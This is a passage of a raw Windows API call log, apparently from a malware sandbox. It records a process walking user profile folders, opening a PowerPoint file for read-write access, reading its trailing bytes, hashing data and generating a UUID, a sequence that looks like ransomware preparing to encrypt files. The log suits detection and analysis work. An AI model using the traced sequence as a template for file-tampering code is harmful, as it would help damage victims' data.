dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0097.420] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.420] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b41c0 [0097.421] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4128 [0097.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0097.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa18 [0097.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0097.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0097.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0097.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0097.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0097.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb530 [0097.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.421] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0097.421] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.421] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.421] PathFindFileNameW (pszPath="") returned="" [0097.422] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.422] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0097.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0097.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0097.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0097.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.422] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.422] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.422] PathFindFileNameW (pszPath="") returned="" [0097.422] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.422] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\") returned="IME12\\" [0097.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0097.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0097.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0097.423] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.423] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.423] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.423] PathFindFileNameW (pszPath="") returned="" [0097.424] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.424] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.424] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\") returned="IMJP12\\" [0097.424] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0097.424] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0097.424] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0097.424] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.424] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.425] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.425] PathFindFileNameW (pszPath="") returned="" [0097.425] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.425] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.425] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\") returned="IMJP8_1\\" [0097.425] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0097.425] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0097.425] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0097.425] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.425] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.425] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.425] PathFindFileNameW (pszPath="") returned="" [0097.426] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.426] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\") returned="IMJP9_0\\" [0097.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0097.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0097.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0097.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.426] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.426] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.426] PathFindFileNameW (pszPath="") returned="" [0097.426] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.426] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.427] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0097.427] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0097.427] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0097.427] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0097.427] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.427] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.427] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.427] PathFindFileNameW (pszPath="") returned="" [0097.428] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.428] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.428] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0097.428] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0097.428] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0097.428] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0097.428] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.428] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.428] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.428] PathFindFileNameW (pszPath="") returned="" [0097.429] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.429] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.430] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\8heHk9af GbEpY7rj\\") returned="8heHk9af GbEpY7rj\\" [0097.430] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\") returned="D7sre-3HX8SgHUb\\" [0097.430] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\") returned="Gydf_ honDHk\\" [0097.430] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0097.430] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.430] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.430] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.430] PathFindFileNameW (pszPath="") returned="" [0097.430] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\8heHk9af GbEpY7rj\\2s5WtO97I.ppt") returned=".ppt" [0097.430] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\8heHk9af GbEpY7rj\\2s5WtO97I.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\8hehk9af gbepy7rj\\2s5wto97i.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.430] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=88013) returned 1 [0097.431] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.434] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x157a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.434] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.435] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df338) returned 1 [0097.436] CryptCreateHash (in: hProv=0x6df338, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.436] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.436] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.436] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.437] GetLastError () returned 0x0 [0097.437] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.437] CryptReleaseContext (hProv=0x6df338, dwFlags=0x0) returned 1 [0097.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.437] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.437] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.437] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x157d0) returned 0x9a06a00 [0097.437] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.437] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.437] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb530 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e08 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb578 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e20 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e50 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e68 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.438] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e50 | out: hHeap=0x680000) returned 1 [0097.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e68 | out: hHeap=0x680000) returned 1 [0097.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e68 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4e50 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x3191ac0 [0097.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e68 | out: hHeap=0x680000) returned 1 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e50 | out: hHeap=0x680000) returned 1 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.439] GetCurrentThreadId () returned 0x8c4 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9a40 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df338 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.439] GetCurrentThreadId () returned 0x8c4 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e50 [0097.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e68 [0097.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e38 [0097.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e80 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e50 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e50 [0097.441] HeapFree (in: 